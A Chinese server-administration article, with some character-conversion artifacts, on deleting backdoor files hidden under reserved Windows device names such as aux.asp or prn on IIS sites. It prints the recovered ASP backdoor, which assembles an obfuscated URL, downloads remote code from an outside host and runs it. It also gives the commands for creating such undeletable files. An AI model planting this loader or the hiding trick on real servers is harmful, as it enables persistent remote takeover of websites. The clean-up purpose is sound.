com1/lpt1/prn/nul 木馬后門處理方法集合
rd /s \\.\E:\webhosting\wwwroot\prn.0418EE4F
<%
'by*aming
dim amxml,amtxt,amado
amtxt="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&"/"&"b"&"o"&"t"&"/"&"c"&"o"&"n"&"f"&"i"&"g"&"."&"t"&"x"&"t"
Set amxml=CreateObject("Microsoft.XMLHTTP")
amxml.Open "Get",amtxt,False,"",""
amxml.setRequestHeader "User-Agent",amtxt
amxml.Send
set amado=Server.CreateObject("adodb.stream")
amado.Type=1
amado.Mode=3
amado.Open
amado.Write amxml.ResponseBody
amado.Position=0
amado.Type=2
amado.Charset="gb2312"
execute(amado.ReadText)
amado.Close
set amado=nothing
Set amxml=nothing
%>
近期有朋友發(fā)現(xiàn)自己的網(wǎng)站目錄下多出許多類似 aux.asp com1.gupiao.asp 的文件或文件夾,無(wú)法刪除!這類文件為何無(wú)法刪除,怎樣建立無(wú)法刪除的文件,又如何刪除 aux.asp 這類 無(wú)法刪除的文件 呢?
在服務(wù)器中 文件夾選項(xiàng) - 查看 -隱藏受保護(hù)的操作系統(tǒng)文件后可看到此類文件屬性均為RHSA系統(tǒng)文件,無(wú)法刪除、修改、移動(dòng)。
Windows 下不能夠以下面這些字樣來(lái)命名文件/文件夾,包括:aux、com1、com2、prn、con、nul 等,因?yàn)檫@些名字都屬于設(shè)備名稱,等價(jià)于一個(gè) DOS 設(shè)備,如果我們把文件命名為這些名字,Windows 就會(huì)誤以為發(fā)生重名,所以會(huì)提示“不能創(chuàng)建同名的文件”。
當(dāng)然,有一些特殊的方法可以投機(jī)取巧,建立以這些設(shè)備名為名的文件夾,比如我們?cè)诿钐崾痉聢?zhí)行“md E:\COM1\\”,就在E盤建了一個(gè)名叫 COM1 的文件夾。此文件夾雖然可以訪問(wèn),也可以建立子文件夾,但卻無(wú)法刪除,在系統(tǒng)看來(lái),這個(gè) COM1文件夾就是設(shè)備。
那么,如何刪除aux、com1等文件/文件夾呢?我們只要按照完整的 UNC 路徑格式,就是網(wǎng)上鄰居的路徑格式,正確輸入文件路徑及文件名即可。比如要?jiǎng)h除E 盤下的 aux 文件夾,可在命令提示符下執(zhí)行:rd /s \\.\E:\aux,rd 帶上/s 參數(shù)表示從所有子目錄刪除指定文件。再比如要?jiǎng)h除 E 盤 aux文件夾下的 nul.exe 文件,在命令提示符下執(zhí)行:del \\.\E:\aux\nul.exe 即可。
采用del \\.\E:\PRN\aux.asp:.jpg的方式,失敗了,最后將其他jpg文件移走,使用rd方式刪除整個(gè)目錄 看圖:
注意尾部加“\\”不然會(huì)出現(xiàn)正常文件夾也出現(xiàn)如圖中的1文件夾無(wú)法訪問(wèn)的情況,重啟后文件夾才會(huì)消失。
其他這種文件的刪除特殊文件資料。
可以在dos中刪除,在開(kāi)始輸入以下命令:
下面是刪除test用戶中的null目錄中所有內(nèi)容
echo y|rmdir \\.\D:\freehost\test\web\nul /s
如果有一些特殊文件,如aux.com.asp無(wú)法刪除,只能先備份用戶的web目錄(備份時(shí)不要選中有問(wèn)題的文件),再用以下命令刪除web目錄所有內(nèi)容:
echo y|rmdir \\.\D:\freehost\test\web /s
要建立這類無(wú)法刪除文件的方法也很簡(jiǎn)單:
copy 123.txt \\.\d:\aux.asp
建立不可刪除的文件夾:
md \\.\d:\prn\\
要?jiǎng)h除這類‘無(wú)法刪除的文件'也是有辦法的,如:d:\wwwroot\web\www 是包含這些無(wú)法刪除文件的目錄。在執(zhí)行命令前,把文件夾中需要備份的程序先移動(dòng)到其他位置,然后使用以下命令可以刪除。
rmdir \\.\d:\wwwroot\web\www /s /q
也可以使用下面的命令直接刪除這些文件:
del \\.\d:\wwwroot\web\www\aux.asp
相關(guān)文章
三種開(kāi)啟重啟遠(yuǎn)程終端服務(wù)的方法
如果服務(wù)器中的終端服務(wù)沒(méi)有啟用或被意外停止,而又恰好急需使用該服務(wù)進(jìn)行遠(yuǎn)程管理服務(wù)器,惟一的辦法就是重新啟用該服務(wù),本文介紹了三種開(kāi)啟重啟遠(yuǎn)程終端服務(wù)的方法,感興趣的小伙伴們可以參考一下2007-12-12IIS 6.0 中修改注冊(cè)表自定義 Httperr.Log
在 Windows 2003 Server 中.IIS 6.0 的日志記錄比 IIS 5.0 要更強(qiáng)大和安全.我們可以通過(guò)設(shè)置日志文件的路徑來(lái)將日志保存在其他地方.比如D盤.因?yàn)槿绻愕?IIS 服務(wù)器流量很大.那放在默認(rèn)的C盤可能會(huì)大量占用硬盤空間2014-01-01win2008 IIS7無(wú)后綴URL部署問(wèn)題 MVC4 MVC URL映射
這篇文章主要介紹了win2008 IIS7無(wú)后綴URL部署問(wèn)題 MVC4 MVC URL映射,需要的朋友可以參考下2015-11-11IIS 7 中設(shè)置文件上傳大小限制設(shè)置方法
有時(shí)候我們需要限制上傳文件的大小,那么可以參考下面的方法2013-09-09IIS7.5 無(wú)法驗(yàn)證對(duì)路徑問(wèn)題的解決方法
最近研究2008 r2 iis7.5,為了安全跟2003一樣需要獨(dú)立用戶,結(jié)果提示無(wú)法驗(yàn)證對(duì)路徑,經(jīng)過(guò)排查終于發(fā)現(xiàn)了問(wèn)題特分享下2014-12-12Windows server 2008 R2 多用戶遠(yuǎn)程桌面配置詳解(超過(guò)兩個(gè)用戶)
這篇文章主要介紹了Windows server 2008 R2 多用戶遠(yuǎn)程桌面配置詳解(超過(guò)兩個(gè)用戶),需要的朋友可以參考下2018-05-05IIS7.5中神秘的ApplicationPoolIdentity介紹
這篇文章主要介紹了IIS7.5中神秘的ApplicationPoolIdentity介紹,需要的朋友可以參考下2015-05-05WIN7下網(wǎng)站用localhost可以訪問(wèn)改為ip不可訪問(wèn)如何解決
iis發(fā)布的網(wǎng)站用localhost可以訪問(wèn),改成IP就無(wú)法訪問(wèn)該怎么解決,本文提供解決方法,需要的朋友可以參考下2012-12-12